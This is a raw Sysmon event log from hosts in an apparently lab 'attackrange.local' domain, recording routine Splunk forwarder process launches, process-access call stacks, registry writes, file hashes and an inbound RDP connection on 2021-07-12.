Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:51.548{466BC892-F36B-60EB-007D-00000000CF01}7736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001046759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:43.204{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-17553-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 13241300x8000000000000000806582Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 07:46:52.485{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f2-0x14439196) 23542300x8000000000000000806581Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:52.375{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6365596455D363E7FB67F956DF672FB,SHA256=29965BBE984E79AEBA39FAF0B69DDF972FAA6C4F93A69B6B2CE758B275F27CE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.931{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36C-60EB-027D-00000000CF01}3864C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.915{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:52.915{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.915{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:52.915{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.915{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F36C-60EB-027D-00000000CF01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.915{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36C-60EB-027D-00000000CF01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.916{466BC892-F36C-60EB-027D-00000000CF01}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.562{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA5FF9CA51531DCDAB896B4EBC01FE12,SHA256=D6B923BF662BF19A5243172BE48C25B4942ACF617245B6ECD3CF70F574EDFA76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:52.247{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36C-60EB-017D-00000000CF01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.231{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:52.231{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.231{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:52.231{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.231{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F36C-60EB-017D-00000000CF01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.231{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36C-60EB-017D-00000000CF01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.232{466BC892-F36C-60EB-017D-00000000CF01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.019{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65A4134EB33C8FB90A85DB142260A12C,SHA256=0D51560CDFE78C5EEEC597B3D68BB5C163E507BEC0967DBFFFF9371EC198B50B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806583Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:53.407{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=735F66DAE9763B61EF737494403D0858,SHA256=9E23AED9554ADF8B229472A1C420CA90FBEF048FED2DFB70E8EBC22C6569F435,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.916{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9C549520E1FE63DDAF46BEA6CF67100,SHA256=7FFC70E93FD80D88421438ED85DAA66902DF679A3462B32408CD99FB3BC5A6F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.799{466BC892-F36D-60EB-037D-00000000CF01}1049996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:53.600{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36D-60EB-037D-00000000CF01}104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.600{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:53.600{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.600{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:46:53.600{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.600{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F36D-60EB-037D-00000000CF01}104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.600{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36D-60EB-037D-00000000CF01}104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
